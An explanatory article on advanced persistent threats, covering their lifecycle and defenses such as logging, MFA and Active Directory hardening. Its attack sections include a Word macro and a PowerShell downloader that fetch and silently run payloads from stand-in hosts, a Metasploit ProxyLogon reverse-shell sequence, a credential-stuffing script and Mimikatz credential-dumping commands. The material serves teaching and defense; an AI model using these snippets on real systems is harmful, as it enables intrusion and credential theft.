APT threats: advanced persistent attacks

Table of contents

• What is an APT
• Common targets of APTs
• The purpose behind APTs
• The APT lifecycle
• Initial reconnaissance
• Initial Compromise
• Real-case timeline (simplified)
• Defense strategies
• Internal reconnaissance
• Lateral movement (pivoting)
• How to defend against APTs
• APTs: a constantly evolving threat

---

Advanced Persistent Threats, or APTs, represent one of the most sophisticated and dangerous forms of cyberattack today.

These threats are not the work of lone hackers but of highly organized groups, often state-sponsored, with access to substantial resources, advanced techniques, and time.

In this article, we’ll explore what APT means, how APT threats operate, and most importantly, how to defend against them in a modern cyber security environment.

Unlike common malware, APTs are not hit-and-run attacks. They are defined by their persistence, sophistication, and stealth. We’ll walk through their typical attack lifecycle, common targets, strategic objectives, technical phases, and the best practices to stay secure—always keeping an eye on the latest cyber security news.

What is an APT

The acronym APT stands for Advanced Persistent Threat, a term that has become central in the field of cyber security.

But to fully understand what APT means, we need to break down the three components of the name. Each word—Advanced, Persistent, and Threat—captures a core aspect of this uniquely dangerous and complex type of cyberattack.

Advanced

The “advanced” nature of an APT refers to the technical sophistication and meticulous planning behind the attack.

APT threats are not limited to simple viruses or malware downloaded from the Internet: they are the result of complex operations that can include exploits of zero-day vulnerabilities (security bugs unknown to the software manufacturer), the use of polymorphic malware, the evasion of detection systems and the manipulation of multiple vectors at the same time (e.g. email, network, USB devices, cloud applications).

Often, attackers build their toolkit to measure, with encrypted payloads, hidden backdoors and extremely stealthy mechanisms for communicating with external servers (C2).

A well-known example is represented by malware such as Duqu or Flame, designed to collect information from strategic targets without being detected by conventional antivirus. This type of approach highlights the use of advanced tactics to remain under the radar for as long as possible and precise targeting, illustrates the “advanced” nature of such threats.

Persistent

The term “persistent” indicates the attacker’s primary objective: not to flee immediately with the loot, but to remain inside the compromised system as long as possible.

We are not talking about lightning attacks, but slow and methodical infiltrations, where the attacker insinuates himself into the network, observes, gathers information, performs reconnaissance and moves with caution. This persistence can last months, if not years, with the aim of invisibly controlling the target’s IT infrastructure, without generating obvious alarms.

The malware used in APTs is often equipped with self-updating and self-regenerating mechanisms. If discovered and removed, it can reappear through other channels, always maintaining a foothold inside the network. It is this resilience that makes APTs so fearsome and difficult to eradicate.

Threat

Finally, the “threat” refers to the structured and organized nature of the attack. An APT attack is not the result of chance or a curious teenager: it is an operation carried out by highly qualified groups, often with significant economic and technical resources, sometimes sponsored by governments or large criminal organizations.

These are the so-called APT groups, known in the international news with acronyms such as APT28 (Fancy Bear), APT29 (Cozy Bear), Lazarus Group, Charming Kitten, and many others. Each group has its own peculiarities, its geographical area of ​​reference and its preferred attack techniques.

Many APT attackers are also able to combine digital techniques with extremely sophisticated social engineering operations, compromising not only the systems, but also the behavior and habits of internal users, with attacks via LinkedIn, email, social media or perfectly credible fake login portals.

APT vs Traditional Malware

What separates an APT attack from regular malware is not just complexity, but intent and scope. A regular ransomware attack may encrypt a company’s data and demand payment—a destructive, visible, and immediate blow.

An Advanced Persistent Threat, on the other hand, moves in the shadows, acting intelligently, studying the IT structure of the organization, striking at weak points and without revealing its presence.

It is like comparing a sudden robbery to a long infiltration operation by a trained spy. Ransomware is noisy, visible, and immediate.

An APT, on the other hand, is silent, calculated, and long-term oriented. This makes APTs extremely dangerous: not only do they cause damage, but they do it without being discovered, often making it impossible to reconstruct precisely what has been stolen, compromised, or altered.

So what does APT really mean?

When people ask, “What does APT mean?” or “APT what is it?”, they should understand it as a sophisticated digital infiltration campaign, often targeting national interests, global corporations, or critical infrastructure.

An APT attack can start with a simple email attachment, but continue with unauthorized remote access, credential theft, data manipulation, attacks on business partners, and much more. And it can remain hidden for as long as necessary.

Modern cyber security must therefore adapt to this new dimension of the cyber threat. Advanced persistent threats are now an integral part of the computer security news landscape, and it is essential for companies, public entities and even advanced users to recognize the signs of a possible infiltration and strengthen their defensive posture.

Common targets of APTs

APT threats are highly targeted and focus on organizations of strategic relevance, such as:

• Government agencies and military institutions
• Multinational corporations (especially in energy, technology, and defense)
• Banks and critical infrastructure (e.g., utilities, healthcare, telecommunications)
• Influential NGOs and think tanks

Example
Stuxnet, an APT designed to sabotage Iran’s nuclear program. Other examples include the SolarWinds hack, the RSA breach, and targeted attacks on universities and biotech companies.

The purpose behind APTs

The goal of an Advanced Persistent Threat is not quick financial gain. Instead, APTs focus on long-term strategic advantages:

• Industrial espionage
  Stealing patents, business strategies, or trade secrets.
• Political/military espionage
  Accessing confidential documents or communications.
• Sabotage
  Disrupting operational systems or infrastructure.
• Geopolitical influence
  Interfering with elections, spreading disinformation, destabilizing regions.

In essence, APTs are tools of control and influence—not just destruction.

The APT lifecycle

One of the defining traits of APTs is their structured, multi-phase approach. These attacks unfold over time and are carefully crafted to remain undetected. Below, we explore the typical APT attack lifecycle.

Initial reconnaissance

The initial reconnaissance phase is the crucial starting point of any Advanced Persistent Threat (APT) campaign. This is where attackers build the foundation for the entire operation, collecting every possible detail about their target.

At this stage, the goal is not to breach systems, but to understand the environment, identify weak points, and plan the attack path with precision. It’s the cyber equivalent of military surveillance or intelligence gathering before an operation.

The strategic value of intelligence gathering

An APT group never launches an attack blindly. Instead, they invest significant time and effort in systematically collecting information.

Depending on the target’s complexity and scope, this phase can last days, weeks, or even months, combining automated scans with meticulous manual research.

The information gathered during reconnaissance is not only used to identify vulnerabilities to exploit, but also to adapt the language and behavior of the malware (or phishing campaign) to the real-world context of the target organization.

This level of customization is one of the reasons why APT threats are so effective.

What kind of information do attackers collect?

During the reconnaissance phase, attackers gather a broad range of intelligence, including:

• Organizational structure
  Leadership, departments, office locations, and internal workflows.
• Key personnel and roles
  Especially IT admins, security staff, finance managers, and C-level executives.
• Vendors and third-party connections
  Potential supply chain entry points.
• Email addresses, usernames, phone numbers
  Used for targeted phishing and credential attacks.
• Technologies in use
  CMS platforms, cloud services, exposed APIs, remote desktop access.
• Network topology
  Public IP ranges, DNS records, VPN endpoints, and load balancers.

Individually, these data points may seem harmless—but together, they form a comprehensive attack map, allowing the APT to craft precise intrusion tactics.

Tools and techniques for reconnaissance

Attackers use a mix of passive and active reconnaissance methods:

• Passive reconnaissance
  Gathering information without interacting directly with the target’s systems.
• Active reconnaissance
  Directly probing the infrastructure through scans, crafted emails, or test payloads.

Let’s look at some of the most common methods:

1. OSINT (Open Source Intelligence)

OSINT is the backbone of passive recon. It involves collecting data from publicly available sources. Common tools and platforms include:

• Google Dorking
  e.g., filetype:pdf site:targetdomain.com to find internal documents.
• LinkedIn
  to profile employees, identify roles and departments.
• Shodan and Censys
  to find internet-exposed devices and misconfigured ports.
• WHOIS, crt.sh, and DNSDumpster
  >For domain and certificate analysis.
• GitHub, Pastebin, and forums
  Where credentials or sensitive files might accidentally be leaked.

2. Social Engineering

The attacker can create fake profiles on social media, sign up for company newsletters, interact in forums or communities where the company is present.

Sometimes they can simulate a candidate for a job position, or pretend to be a supplier looking for information. These techniques exploit human psychology, more than technology, and often represent the most delicate and creative part of reconnaissance.

3. Reconnaissance phishing (non-malicious probes)

In more active campaigns, attackers may send non-malicious emails to test the responsiveness of users. These messages:

• Confirm which email addresses are active
• Track who opens links or downloads files
• Reveal security layers (e.g., email filtering or MFA)
• Capture metadata like IP addresses or mail client types

This helps attackers calibrate future spear phishing emails, making them more believable and effective.

4. Active scanning and fingerprinting

Though riskier, active reconnaissance provides deeper insights. Tools and techniques include:

• Nmap, Masscan: scanning for open ports and services
• WhatWeb, Wappalyzer: identifying CMS and frontend technologies
• Netcraft: gaining information on hosting providers and uptime history
• FOCA: extracting metadata from documents (e.g., Word, PDF files published on the site)

Example of an Nmap scan command:

nmap -sV -T4 -Pn -p 1-10000 targetdomain.com

This could reveal which services are running, and whether any are outdated or vulnerable.

Behavioral profiling: a modern APT tactic

Elite APT actors don’t stop at technical data—they also build behavioral profiles. These profiles track:

• Working hours and time zones of IT staff
• Typical email or communication patterns
• Administrative routines (e.g., maintenance windows)
• Device usage and login behavior

Such insights allow attackers to strike during weak points—like holiday periods, employee transitions, or late-night hours—maximizing their chances of success while avoiding detection.

Reconnaissance: the blueprint of the entire attack

By the end of this phase, the attacker has constructed a detailed blueprint of the target’s digital environment. They now know:

• How to impersonate an insider
• Where the valuable data is stored
• Which systems are most vulnerable
• When and how to move without triggering alerts

This strategic knowledge is what sets APTs apart from regular cyberattacks. Their success depends heavily on the quality of reconnaissance. The better the intelligence, the smoother the intrusion and the longer the persistence.

Initial Compromise

Once attackers have completed thorough initial reconnaissance, they move to the next critical step in the APT lifecycle: initial compromise.

This is where the operation shifts from passive intelligence gathering to active intrusion. It’s the moment when the attacker finds a way to penetrate the target’s defenses and gain a foothold in the network or system.

Unlike typical malware campaigns, initial compromise in APT attacks is highly customized, precise, and designed to evade detection.

Let’s examine the most common techniques used, supported by real-world examples and code snippets.

1. Spear Phishing

The most widespread and successful technique for APT initial access is spear phishing—a targeted phishing attacktailored specifically to the victim.

It uses the intelligence gathered during reconnaissance to craft convincing emails that appear to come from trusted sources like colleagues, vendors, or internal departments.

Real-world scenario:

An attacker sends an email to an HR employee, posing as a job applicant. The attached resume is a Word document containing a malicious macro that opens a backdoor on the victim’s machine.

Example: malicious VBA macro in Word

Sub AutoOpen()

    Dim url As String

    url = "http://malicious-server.com/payload.exe"

    Dim http As Object

    Set http = CreateObject("Microsoft.XMLHTTP")

    http.Open "GET", url, False

    http.Send

    Dim stream As Object

    Set stream = CreateObject("ADODB.Stream")

    stream.Type = 1

    stream.Open

    stream.Write http.responseBody

    stream.SaveToFile "C:\Users\Public\payload.exe", 2

    Shell "C:\Users\Public\payload.exe", vbHide

End Sub

When the document is opened and macros are enabled, the code downloads and silently executes the malware.

2. Exploiting Zero-Day Vulnerabilities

Zero-day vulnerabilities are unpatched security flaws unknown to the vendor. These are among the most powerful tools in the APT arsenal, as there is often no immediate defense available.

Attackers exploit these flaws through malicious documents, vulnerable web apps, or exposed services like Exchange, RDP, or VPNs.

Notable example:

In the Hafnium APT campaign, attackers used four zero-day vulnerabilities in Microsoft Exchange (the “ProxyLogon” chain) to gain remote code execution and access internal emails.

Simulated exploit using Metasploit:

use exploit/windows/http/exchange_proxylogon_rce

set RHOSTS mail.targetcorp.com

set LHOST 10.0.0.5

set LPORT 4444

exploit

Once exploited, a reverse shell is created, giving the attacker full control over the system.

3. Malicious File Attachments

In many cases, attackers use infected Office documents, PDFs or ZIP archives, attached to perfectly contextualized emails (commercial offers, orders, invitations, invoices). The user, trusting, opens the file and triggers the execution of the malicious code.

Example: PowerShell downloader embedded in a macro

$wc = New-Object Net.WebClient

$wc.DownloadFile("http://badhost.com/backdoor.exe", "$env:TEMP\backdoor.exe")

Start-Process "$env:TEMP\backdoor.exe"

This script downloads a backdoor and executes it silently on the machine. If the organization does not restrict PowerShell or prevent macro execution, the infection can occur in seconds.

4. Stolen Credential Access

APT actors often acquire stolen credentials through previous data breaches, phishing, or dark web purchases. With valid usernames and passwords in hand, they can access:

• VPNs and remote access systems
• Cloud platforms like Office 365, Google Workspace, or Azure
• Admin panels or privileged accounts
• Shared workstations and internal tools

Often, if the credentials are not protected by MFA, the attacker can log in undetected, appear to be a legitimate user, and begin lateral movement.

Example: automated login attempt in Python

import requests

url = "https://vpn.corporate.com/login"

data = {

    "username": "admin.user",

    "password": "Summer2024!"

}

response = requests.post(url, data=data)

if "dashboard" in response.text:

    print("Login successful!")

else:

    print("Login failed.")

This script can be part of a credential stuffing tool that tests thousands of known username-password pairs. If multi-factor authentication (MFA) is not in place, attackers may go unnoticed.

Initial compromise conclusion

Once initial access is gained, the attacker is “in”. However, the goal of an APT threat is not just to enter: it is to stay, move, explore and strike deeply.

At this point, the malware can install a backdoor, perform privilege escalation and start internal mapping of the network.

The initial compromise phase is therefore the real turning point: from here the silent operation begins that can turn into espionage, theft, sabotage or extortion on a large scale.

Preventing it means investing in user training, network segmentation, behavioral analysis and constant log monitoring.

Real-case timeline (simplified)

Once “inside”, the attacker creates a foothold, a persistent access point:

• Installs a backdoor
• Configures auto-execution mechanisms
• Circumvents antivirus systems

A C2 (Command and Control) is often used to receive instructions or download additional payloads.

Privilege escalation

In order to operate with full freedom, the attacker tries to obtain administrative privileges. This phase can include:

• Credential dumping from memory (with tools like Mimikatz)
• Local exploits to elevate permissions (e.g. recent CVEs)
• Abuse of incorrect configurations

Example code in PowerShell to extract credentials:

Invoke-Mimikatz -Command '"privilege::debug" "log" "sekurlsa::logonpasswords"'

Internal reconnaissance

After successfully gaining initial access to the target’s network—whether through phishing, exploit, or stolen credentials—an attacker engaged in an APT threat doesn’t immediately move to exfiltration or disruption.

Instead, they proceed with a critical step: internal reconnaissance.

This phase allows the attacker to understand the environment, identify valuable assets, map the network, and prepare for privilege escalation or lateral movement.

Think of it like a burglar who doesn’t just enter a house, but explores all the rooms, checks which doors are locked, finds keys, and maps out the security systems—without being noticed.

Objectives of internal reconnaissance

The attacker’s goals in this phase are to:

• Enumerate internal hosts, shares, and databases
• Identify critical systems like domain controllers, financial servers, or backups
• Explore Active Directory relationships and group memberships
• Understand the organization’s security policies
• Harvest additional credentials to escalate privileges

These actions are typically carried out using native tools or “living off the land” techniques, which allow attackers to blend in with legitimate system activity.

1. Host and share enumeration

The first step is to discover which systems are accessible from the current foothold. The attacker uses common Windows tools and scripting languages like PowerShell to identify live hosts and shared folders.

PowerShell: Scan a subnet for active hosts

1..254 | ForEach-Object {

    $ip = "192.168.1.$_"

    if (Test-Connection -ComputerName $ip -Count 1 -Quiet) {

        Write-Output "$ip is alive"

    }

}

This script pings each IP address in a /24 subnet to find online devices.

View shared folders on a discovered host

net view \\192.168.1.50

Or using PowerShell:

Get-SmbShare -CimSession 192.168.1.50

These commands can expose poorly secured shares containing documents, credentials, or network diagrams—often gold mines for attackers.

2. Active Directory user and group enumeration

Understanding Active Directory (AD) is one of the attacker’s top priorities. AD is often the central nervous system of corporate IT environments.

List all AD users and their groups:

Get-ADUser -Filter * -Properties DisplayName, MemberOf | Select Name, MemberOf

Identify privileged accounts:

Get-ADGroupMember -Identity "Domain Admins"

By analyzing these relationships, attackers can plan stealthier lateral movement toward sensitive systems.

3. BloodHound: Visualizing Active Directory attack paths

BloodHound is one of the most powerful tools in an APT actor’s arsenal for mapping attack paths within AD. It builds a graph of relationships between users, computers, groups, and ACLs to show how an attacker can escalate privileges.

How BloodHound works:

1. The attacker runs SharpHound on a compromised host.
2. It collects AD data (sessions, group memberships, ACLs).
3. The data is loaded into the BloodHound GUI, which reveals paths to sensitive assets.

SharpHound command example:

SharpHound.exe -c All -d targetdomain.local -zipfilename data.zip

Once analyzed, the attacker sees:

• Shortest paths to Domain Admins
• Kerberoastable users
• Excessive permissions and misconfigured ACLs

These visual insights help prioritize which accounts or systems to compromise next.

4. Assessing security controls and audit settings

APT attackers want to understand how much freedom they can move. They analyze GPOs (Group Policy Objects), file permissions, active auditing, and defense mechanisms such as Windows Defender, EDR, or SIEM in place.

Check audit policy:

auditpol /get /category:*

Check if Windows Defender is running:

Get-MpComputerStatus

If the environment lacks proper auditing, the attacker can act with impunity—and many do for weeks or months before being discovered.

5. Credential and token harvesting

During internal reconnaissance, attackers look for configuration files, stored passwords, session tokens, and cookies. Passwords are often in plain text or poorly protected.

Example: Using Mimikatz to dump credentials

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Or, token collection for impersonation:

mimikatz # sekurlsa::tickets

With these credentials the attacker can impersonate other users, even administrators, without needing a password.

Lateral movement (pivoting)

Now the attacker performs lateral movement to reach deeper systems:

• Using Pass-the-Hash or stolen credentials
• Connecting via RDP, WMI, or PsExec
• Leveraging built-in admin tools to avoid detection

This phase is often where the attacker makes contact with sensitive systems.

Maintaining presence

A core goal of APT attacks is long-term persistence:

• Creating hidden admin accounts
• Replacing or modifying legitimate binaries
• Installing rootkits or firmware-based implants

Some attackers lie dormant for months before reactivating their access.

Mission completion

Finally, attackers execute their objective:

• Data exfiltration (via encrypted channels or cloud services)
• Sabotage (deleting, modifying, or encrypting data)
• Propagation to partners or subsidiaries

The most insidious part is that the attack can go unnoticed for months, causing enormous damage before being discovered.

How to defend against APTs

Defending against Advanced Persistent Threats is not a matter of installing antivirus software and hoping for the best. These threats are stealthy, intelligent, and designed to evade traditional security measures.

That’s why organizations must adopt a multi-layered security strategy that integrates advanced technology, strong policies, and a pervasive security-first culture.

The most effective defense is one that combines prevention, detection, response, and resilience. It’s not about building an impenetrable wall—it’s about creating an environment where intrusions are spotted early, contained quickly, and where damage can be mitigated effectively.

Logging: visibility is everything

Centralized logging is the foundation of any effective defense infrastructure against APTs. Collecting logs from systems, firewalls, endpoints, servers, applications, and cloud services allows you to correlate suspicious events and identify anomalous patterns of behavior.

Recommended tools:

• SIEM platforms like Splunk, ELK Stack, Wazuh, IBM QRadar
• UEBA, solutions that detect behavioral deviations from user and system baselines

Example:

A SIEM detects a PowerShell scan initiated from an HR user account at 2:00 AM—a behavior that clearly deviates from the user’s typical pattern.

# Example Kibana query to detect suspicious PowerShell usage

process.name: powershell.exe AND process.args: "*Invoke-Command*" AND user.name: "hr_user"

Logging doesn’t just support real-time monitoring—it provides historical visibility that’s crucial when analyzing a breach that has been ongoing for weeks or months.

Account Hardening: securing identity

User accounts are one of the most targeted attack surfaces. Once an attacker gains valid credentials, they can move laterally, escalate privileges, or impersonate legitimate users.

Best practices:

• Multi-Factor Authentication (MFA)
  Required for all external and privileged access.
• Centralized password management
  Using tools like HashiCorp Vault, CyberArk, or Bitwarden Enterprise.
• Minimize privileges
  Avoid predictable account names like “admin”.

Example:

If a user normally logs in from Milan between 9:00 and 18:00, a login attempt from Singapore at 3:00 AM should trigger an automated alert.

Active Directory Hardening: securing the core

Active Directory (AD) is often the ultimate prize for attackers—it controls user privileges, access policies, and network visibility. Hardening AD is therefore a top priority.

Defensive strategies:

• Tiered admin model: separate Tier 0 (Domain Admins) from Tier 1 (servers) and Tier 2 (workstations)
• LAPS (Local Admin Password Solution): eliminates shared local admin passwords
• Audit changes to groups and policies regularly

Technical example:

Enable auditing for security group modifications:

auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable

This ensures real-time logging of critical group changes, such as unauthorized additions to “Domain Admins”.

Endpoint Hardening: fortifying entry points

Endpoints—laptops, desktops, and mobile devices—are typically the first targets in an APT campaign, often compromised via phishing or exploits.

Recommended measures:

• EDR solutions
  Such as CrowdStrike, SentinelOne, or Microsoft Defender for Endpoint
• Application control
  Via AppLocker or Windows Defender Application Control to restrict script execution
• Aggressive patching
  Especially for browsers, office suites, and VPN clients

BYOD (Bring Your Own Device) strategies:

• Enforce device segmentation
• Use MDM solutions like Intune, Jamf, or Kandji
• Allow internal access only from managed, compliant devices

Example:

An EDR can be configured to block any executable launched from the AppData\Roaming directory with a suspicious parent process:

{

  "rule": {

    "if": "process.path == '*\\AppData\\Roaming\\*.exe' && parent_process.name == 'explorer.exe'",

    "then": "block_and_alert"

  }

}

Beyond technology: building a security culture

Technology alone is not enough. A mature cyber security posture requires a culture of awareness and responsibility across all levels of the organization. Key components:

• Continuous employee training on phishing, social engineering, and secure behavior
• Regular red team and purple team exercises to test real-world defenses
• Executive involvement to embed security into business decision-making

APTs: a constantly evolving threat

APT threats are not static—they evolve. Modern trends include:

• Use of AI and machine learning to avoid detection
• Exploiting cloud-native environments
• Attacking supply chains and CI/CD pipelines
• Sophisticated social engineering tactics

Staying informed via computer security news and cyber security news is essential. Every week, new groups, new exploits, and new threats emerge—APT security is a moving target.

---

Questions and answers

1. What does APT mean?
   APT stands for Advanced Persistent Threat—a long-term, stealthy cyberattack.
2. Who are common targets of APTs?
   Governments, enterprises in critical sectors, and research institutions.
3. How does an APT attack work?
   Through a structured, multi-phase process: reconnaissance, compromise, pivoting, and mission execution.
4. How are APTs different from regular malware?
   They are persistent, stealthy, and often state-sponsored or backed by major crime groups.
5. What is a zero-day vulnerability?
   A software bug unknown to the vendor and unpatched at the time of exploitation.
6. Can APTs be prevented?
   Not entirely, but you can significantly reduce the risk with proper security architecture.
7. What role does a SIEM play in APT defense?
   It helps detect abnormal patterns and correlates data across systems to uncover stealthy intrusions.
8. Do APTs target small businesses too?
   Yes, especially if they’re part of a larger supply chain or have valuable intellectual property.
9. What is lateral movement?
   When attackers move through a network to access other systems after initial compromise.
10. What keywords relate to APTs?
    APT, APT threat, advanced persistent threat, cyber security news, computer security news, APT what does it mean, zero-day, advanced persistent, APT attacks.